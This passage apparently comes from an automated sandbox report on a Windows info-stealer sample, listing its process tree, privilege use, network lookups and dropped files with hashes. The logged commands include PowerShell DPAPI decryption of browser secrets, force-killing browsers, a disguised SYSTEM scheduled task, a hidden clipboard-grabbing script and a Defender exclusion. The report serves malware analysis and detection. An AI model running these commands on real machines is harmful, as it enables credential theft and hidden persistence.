| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\xylex (1).exe
"C:\Users\Admin\AppData\Local\Temp\xylex (1).exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9eb3b9758,0x7ff9eb3b9768,0x7ff9eb3b9778
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4548 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3712 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4748 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t2s52bq2\t2s52bq2.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2507.tmp" "c:\Users\Admin\AppData\Local\Temp\t2s52bq2\CSCF622ED14E04E49A99BFB8C123274096.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM chrome.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM msedge.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvqvcua3\fvqvcua3.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F75.tmp" "c:\Users\Admin\AppData\Local\Temp\fvqvcua3\CSCA4DC5115CC9C4B2DBC6C33A57973739F.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wininit.exe
C:\Windows\system32\wininit.exe
"C:\Windows\system32\wininit.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\AppData\Local\Temp\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
memory/1648-74-0x00007FF9EA533000-0x00007FF9EA535000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wcpgu40w.dwo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1648-84-0x000002A088E00000-0x000002A088E22000-memory.dmp
\??\pipe\crashpad_3292_HVDVGXMGKVWKBHRX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1648-92-0x000002A0A1E00000-0x000002A0A1E44000-memory.dmp
memory/1648-93-0x00007FF9EA530000-0x00007FF9EAFF1000-memory.dmp
memory/1648-94-0x00007FF9EA530000-0x00007FF9EAFF1000-memory.dmp
memory/1648-95-0x00007FF9EA530000-0x00007FF9EAFF1000-memory.dmp
memory/1648-96-0x000002A0A1ED0000-0x000002A0A1F46000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\t2s52bq2\t2s52bq2.cmdline
| MD5 | eb9b38f4f595ab71dcaf4e54f123137f |
| SHA1 | 2a3db84c9d40f1be0071d67568b6383bb66a29a6 |
| SHA256 | 1ade288056a0118d5fcae6d8aea726b01f0807f167ec8e8823c7393f266db00a |
| SHA512 | 6a959ec8c382a1872e84ef62fcd00339e3af3007a7fbdbebb77e3c725602ad9c7cc15890f986e451f440134b9174af26b86f78af1d5b1a316d437be7538ca24c |
\??\c:\Users\Admin\AppData\Local\Temp\t2s52bq2\t2s52bq2.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\t2s52bq2\CSCF622ED14E04E49A99BFB8C123274096.TMP
| MD5 | 1a0dd9fa3a4ef5574b1a83482b4baed0 |
| SHA1 | a74568104ff5f81b3a2608d0c500bd7249035226 |
| SHA256 | b6b7c97a0c5e048829627b5adcd40db6f8e24953c708f4a63129855570b719b5 |
| SHA512 | 2005cc24551a340794f901bd3e8190fe3b6418b5ba5710ecbf356d3d87b41f86bf13f1ab363e0c4a13611c9cdbd9cf1100bad4ecbac0af5a41926eb742fdbb17 |
C:\Users\Admin\AppData\Local\Temp\RES2507.tmp
| MD5 | 7d55c8167210fd96244052f1cfedd35f |
| SHA1 | e8062127afda487b1f13260c2b09475473cc0470 |
| SHA256 | 26b59007d076c286ca4a6f84136019d985de9a0a870bee399a0fc8b6a101e439 |
| SHA512 | 40e6ba01576de4ea3523e02781900130c785574f65129a7b964f64fbcd2c4da3288e73f0313ace7c7f07e21cef7c868ca1d251b18abc7dc35ebe3300b25133fe |
C:\Users\Admin\AppData\Local\Temp\t2s52bq2\t2s52bq2.dll
| MD5 | d07a9159a51c1aadbf23bd954263a7f0 |
| SHA1 | ff4b755733819084a140f79f194979707335c302 |
| SHA256 | acb693e71d77e73573efd3be64f9b6842f7816a9c36640f6b8e14bda37aaa619 |
| SHA512 | 4d7a65fc36005a7aab24f8dc93bca4bcaaa6a7757c355fbc574fd7da02bac75db16a5d04ad0a27226b04509a7f3305fec261255cc14bc8b3484b75694ddfa7ef |
memory/1648-119-0x000002A0A1DB0000-0x000002A0A1DB8000-memory.dmp
memory/1648-123-0x00007FF9EA530000-0x00007FF9EAFF1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d1d5c8ea4a9dd482f2a00a62e6e76519 |
| SHA1 | 6747bfa8665aa71ca195fec6cc31cb1288190f92 |
| SHA256 | 635c750cb1db1568ce591d1a44de431ae63320d899e96188126b886c33480bf4 |
| SHA512 | f3c95aaff263c16885144faac580b95b6b107fc81ea2e40452ed7da840839923c60b7da8c705655d8fbbc1b322b25de1f8d63e03627b65495a85d3fdfefeab95 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/636-143-0x0000016EDF020000-0x0000016EDF070000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d1ba74640acd402c938120ae23285c4f |
| SHA1 | 2844c0e8b47cfc917cb7f73a901a2621b4dab28a |
| SHA256 | 68fef826a5bab279678aa5a4547c8eefde51f97cdbf4f54ca880ea1e6e4e9c6d |
| SHA512 | 40a23a06d39a04ebd0b258e4240bb665ada4a6cf084b54de5034c94c8ee80cf610af2b5b606b2234620a124ac8ea84a97f7d967dee8e713038dbc41deafe401f |
C:\Users\Admin\AppData\Local\Temp\fa9e6dbd449a0e947e06f7454733ce52b8LNwL\WaitBackup.txt
| MD5 | ed6ab15dec95b162a3fe2008bce06d81 |
| SHA1 | 4597069773c578c101fa677bfc45e985dbd6e53d |
| SHA256 | 2b3f19a142057068ee8426cc2083ddfd317b9cf39f40942229ac2b212ea41420 |
| SHA512 | ecd7d21eba4803ae3b6c0f217155f4c1b10728b1abcc2a16100750ad39e0225080c59eee1190dd2e3d5ca46acf6919153c00b20eef6f4df7fa952cdb5e246b3b |
C:\ProgramData\Steam\Launcher\EN-Oailvcny\debug.log
| MD5 | 98e81de7514087fa618e886aefb86597 |
| SHA1 | cd4a84c42f9a6c3cd6e6e7b76f9e5944ad6ed8aa |
| SHA256 | fac82e07b129c75e8d50fd5d35dafc04c3440ca904ff2ca3ec675725eb72ee6c |
| SHA512 | 6942aeaeda0a4d7555d66472e567c60e81d14aeb31e07b1cf0ace25cf8e1c488759e7fee78fc42819451863dbcd567061c44ee933397dda0d0f9f8701e07580b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 71c3375194be555a4a50b723092300f5 |
| SHA1 | be707071e06890f7c4eeb6eb09a403fcee4637e9 |
| SHA256 | a3ef75679a8cad4f8c5374d3c66516731bde0584e8e0200ec0b14e49e9a90cbb |
| SHA512 | 150c480ad3b49142bb360ce5f50e2fb32d2ad8dc7114be7d9a7cf941202d509cc00b121ec14c5e29eab72979571e12f0f740f509a90c1c639cb6db2bae9a23de |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | d75620c7875c01b02e5fc6398d8b9dae |
| SHA1 | ba4406ac940143e73daf2532ce87ba2dc7c0cf6a |
| SHA256 | d4000df0cad3869aeb7abcc2531256f6036b5159dc318c4c6bc4bbf3fc34839d |
| SHA512 | 11b0a86828550f7e2302901f33399e0fb8916181caba061b20ea06193784dada1fb677eadadb185d969fdb54893f2e616c2ce8984f8c86b9ede859c1689760cc |
\??\c:\Users\Admin\AppData\Local\Temp\fvqvcua3\fvqvcua3.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\fvqvcua3\fvqvcua3.cmdline
| MD5 | 0cd30dde084f4ae494337c06efce6c11 |
| SHA1 | c2ca11bd42f7bfc924b4a2090d291dcb36695a9d |
| SHA256 | 52fcc057cf749e1197d1533bfe105d2b5c4488deb8708dc4adc1a1a224bc9637 |
| SHA512 | 323c758eaa1a7bc3446780bff18212d33264f6a72403a9cb0b6f88cb1f472198a151d2104ae29fbbc3a5c0329e201050e2babd2b46d7891bb2655d49b99e9ace |
\??\c:\Users\Admin\AppData\Local\Temp\fvqvcua3\CSCA4DC5115CC9C4B2DBC6C33A57973739F.TMP
| MD5 | fb587167507f4c1f235e6cc2d7344e08 |
| SHA1 | 4ec9c6a72c5adba3d2d59fdd8c46c1146878b530 |
| SHA256 | 43a93a91ec1172d738f78e88d1390ceac022bcd94cc87f885490e61d707e42d1 |
| SHA512 | 6343ce47ba624ffa439c2c4e37f0272666165cceeacaa59635aa55ee0a987ed35e34157fde69e7c0d60a174434a2e4e81fa697d2abcfa2a6e09aeae4d8ea8add |
C:\Users\Admin\AppData\Local\Temp\RES3F75.tmp
| MD5 | 9681774c7877eafe2bc51d7076c51911 |
| SHA1 | 71a2fa8083d438e8374e04c9afc4b518e47a881d |
| SHA256 | fda56f92e8ec8541722d98e9736ed2299417eed38a46ffd846c741596631a61b |
| SHA512 | b3dafd18128a6c7c3ee610fe8b4cc25bc85b1b1ee01a5fc2d10395fc26df054d1930e2c103018e1e30987c885709c1330d1b08e799c0e35d664052df011bee1e |
C:\Users\Admin\AppData\Local\Temp\fvqvcua3\fvqvcua3.dll
| MD5 | b5a17fa66b623502ef18729759e77601 |
| SHA1 | 4bd2871b40beafc24b9d131cc9316b94954c8288 |
| SHA256 | ffe93a50d638243bf13c17934b87d92a389c44b57e114c57219661d8461c44c5 |
| SHA512 | 0074754bfdee72503b1a148b7ac012f6260b6953640b2e1132c7ef194a7d8e665b0b7ab2dcb5525e3d522d013878283c8a783f11e3e8213f2c7f3c161cd0d9f9 |
memory/2196-228-0x0000020B39600000-0x0000020B39608000-memory.dmp